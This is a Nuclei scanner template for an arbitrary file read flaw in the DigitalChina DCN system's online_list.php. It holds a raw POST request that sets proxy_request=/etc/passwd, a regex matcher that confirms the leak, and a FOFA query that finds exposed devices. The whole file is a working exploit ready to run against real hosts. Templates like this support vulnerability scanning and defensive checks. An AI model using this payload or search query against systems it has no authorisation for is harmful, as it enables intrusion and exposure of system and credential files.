id: dcn-online_list-fileread
info:
  name: 神州数码 DCN online_list.php - 任意文件读取
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/main/DCN/%E7%A5%9E%E5%B7%9E%E6%95%B0%E7%A0%81DCN%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3online_list.php%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    fofa-query: body="style/blue/css/dcn_ui.css"
  tags: 2024,fileread,dcn,iot

http:
  - raw:
      - |
        POST /function/auth/user/online_list.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        proxy_request=/etc/passwd

    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
